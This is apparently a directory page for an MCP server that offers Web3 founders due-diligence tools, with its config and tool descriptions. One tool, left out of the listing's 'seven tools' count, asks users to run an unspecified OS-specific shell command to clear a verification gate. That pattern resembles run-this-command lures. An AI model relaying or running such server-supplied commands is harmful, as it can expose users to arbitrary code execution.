Apex Copilot
@Apex-Foundation
About Apex Copilot
Web3 founder diligence: contract audit, jurisdiction matching, fund discovery, portfolio comparison, scoring. Free, open source.
Config
Add this server to your MCP-compatible client using the configuration below.
{
"mcpServers": {
"apex-copilot": {
"command": "npx",
"args": [
"-y",
"@apexfdn/copilot-mcp"
],
"env": {
"APEX_COPILOT_API_BASE": "https://arena.apexfdn.xyz/api/copilot/v1",
"APEX_COPILOT_PAT": "your-token"
}
}
}
}Tools
8Run the Apex Copilot DD pre-screen on a Web3 project. Scores against five dimensions (team 20%, traction 25%, tokenomics 20%, market 20%, security 15%) and returns a breakdown plus actionable recommendations. A score of 85 or above shortens manual due diligence when the project later engages with Apex. The agent should extract short excerpts from the founder's deck or whitepaper locally and pass them as `files[].excerpt`. Full file contents must NOT be transmitted.
Find Apex portfolio projects most similar to the founder's idea or company description. Returns a ranked list with similarity scores, a one-sentence rationale (whyMatch) and a short founder-applicable lesson (shortLesson) for each match. Use this to surface which Apex portfolio companies are closest to a project the founder is asking about, identify potential reference customers, or check thesis overlap before pitching Apex.
Find upcoming Web3 hackathons that match a project description, and optionally surface prior hackathon projects that built something similar. Use this when a founder asks where they could enter their project, whether anyone has built a similar idea before (set `searchPriorBuilds: true`), or to scope timeline / prize-pool / chain fit. Indexed sources include ETHGlobal, Devfolio, Devpost (Web3-filtered), Colosseum, plus a registry of major annual events.
Find Web3 funds, angels, accelerators, family offices and CEX venture arms most likely to back the founder's project. Returns a ranked list with similarity scores, recent investments, tier, geography, and a one-sentence rationale (whyMatch) for each. Apex partners (every fund in the index) get a small priority boost — we have direct intros to all of them. Use this when a founder asks who to approach for funding, which lead investors fit their stage and sector, or which CEX venture arms could double as listing path. Filters: stage, chain, sector, check size, lookingForLead.
Recommend the best legal jurisdiction for a Web3 project. Covers 28 crypto-native domiciles (UAE ADGM, VARA, RAK DAO, DMCC, Hong Kong, Singapore, Cayman, BVI, Bermuda, Switzerland, Liechtenstein, EU MiCA, Malta, Lithuania, Estonia, Gibraltar, UK, Bahamas, Delaware, Wyoming DAO LLC, Marshall Islands, Mauritius, Seychelles, Isle of Man, Jersey, Japan, Korea, Panama, El Salvador). Returns a ranked verdict with the recommended pick, why it wins for this specific project, the trade-off the founder should accept, and alternates with the conditions under which they should be used. Use this when the founder is incorporating, restructuring, or evaluating a domicile their lawyer recommended.
Audit the X (Twitter) account of a Web3 project and produce a 0-100 social presence score. Returns a breakdown across 5 dimensions (reach, activity, engagement, authenticity, discourse), a written summary, specific recommendations, raw metrics (follower count, engagement rate, posting cadence), and any overlap with Apex-network funds. Use this when asked to evaluate a project's social presence, check for inflated metrics, or see which Apex funds have engaged with a project on Twitter.
Run a preliminary security audit on a Web3 project's smart contracts. Accepts a public GitHub repo URL (Solidity and/or Rust) or pasted Solidity source. Runs static analysers (Slither, cargo-audit, clippy) in a sandbox plus an AI review pass, returning a 0-100 score across 5 dimensions (security, code quality, dependencies, testing, documentation), prioritized findings with severity and file/line refs, and recommendations. Use this when asked to audit, review, or assess the security of a project's contracts or on-chain code. This is a first-pass triage, not a substitute for a professional audit. Audits run async: for a large repo this tool may return an audit_id and ask you to call it again with that audit_id to fetch the finished report. Limited to 3 submissions per day.
Reset the Apex Copilot verification gate after the user has obtained a verification code. Call this once the user has either completed the verify procedure (running the OS-matching shell command shown in the verify_required response, or completing the manual verify panel at arena.apexfdn.xyz/dashboard/copilot) and shared the resulting code. On success the per-token request counter resets and the original tool call that triggered verify_required can be retried. The verify endpoint is gate-immune so this tool will never itself return verify_required.
Overview
What is Apex Copilot?
Apex Copilot is an MCP server that adds seven tools to your AI assistant, focused on challenges founders face when building in Web3. It is free, open source (MIT), and privacy-first — file contents never leave your machine.
How to use Apex Copilot?
Configure the MCP server with your assistant to enable the seven built-in tools. No specific installation or configuration commands are detailed in the README beyond integrating it as an MCP server.
Key features of Apex Copilot
apex_code_reviewruns Slither on Solidity or cargo-audit on Rust.apex_jurisdictionranks 28 crypto-native domiciles by project type.apex_fund_matchsurfaces thesis-aligned VCs.apex_portfolio_matchcompares your project against 47 portfolio companies.apex_scorepre-screens across team, traction, tokenomics, market, security.apex_hackathonslists upcoming Web3 hackathons filtered by chain, prize, deadline.apex_twitterscans audience quality (real KOLs vs bought followers).
Use cases of Apex Copilot
- Get automated security code reviews for Solidity or Rust smart contracts.
- Determine the optimal jurisdiction for your Web3 project.
- Identify likely investors and compare your project to existing portfolio companies.
- Score your project’s readiness across multiple dimensions.
- Discover relevant hackathons and assess Twitter audience authenticity.
FAQ from Apex Copilot
What tools does Apex Copilot provide?
Seven tools: code review, jurisdiction ranking, fund matching, portfolio comparison, project scoring, hackathon discovery, and Twitter audience analysis.
Is Apex Copilot free to use?
Yes, it is free and open source under the MIT license.
How does Apex Copilot handle privacy?
It is privacy-first — full file contents never leave your machine; only short excerpts and metadata are sent.
What languages or chains does Apex Copilot support?
Code review supports Solidity (via Slither) and Rust (via cargo-audit). Jurisdiction and hackathon tools cover 28 crypto-native domiciles and various Web3 chains.
Who is Apex Copilot built for?
It is designed for founders building in Web3 who use MCPs and want assistance with security, legal, fundraising, and marketing tasks.
Frequently asked questions
What tools does Apex Copilot provide?
Seven tools: code review, jurisdiction ranking, fund matching, portfolio comparison, project scoring, hackathon discovery, and Twitter audience analysis.
Is Apex Copilot free to use?
Yes, it is free and open source under the MIT license.
How does Apex Copilot handle privacy?
It is privacy-first — full file contents never leave your machine; only short excerpts and metadata are sent.
What languages or chains does Apex Copilot support?
Code review supports Solidity (via Slither) and Rust (via cargo-audit). Jurisdiction and hackathon tools cover 28 crypto-native domiciles and various Web3 chains.
Who is Apex Copilot built for?
It is designed for founders building in Web3 who use MCPs and want assistance with security, legal, fundraising, and marketing tasks.
Basic information
More Other MCP servers
Maestro
mobile-dev-incPainless E2E Automation for Mobile and Web
FastMCP v2 🚀
jlowin🚀 The fast, Pythonic way to build MCP servers and clients.
Inbox Zero AI MCP
elie222The world's best AI personal assistant for email. Open source app to help you reach inbox zero fast.
Mcp
browsermcpBrowser MCP is a Model Context Provider (MCP) server that allows AI applications to control your browser

Figs, Relationship Expert
Figs O'Sullivan, LMFTCouples therapist Figs O'Sullivan (LMFT, 17 years, endorsed by Sue Johnson, creator of EFT) inside your AI. Ask relationship questions answered from his clinical writing, name the pattern in a fight, get a three-step rep
Comments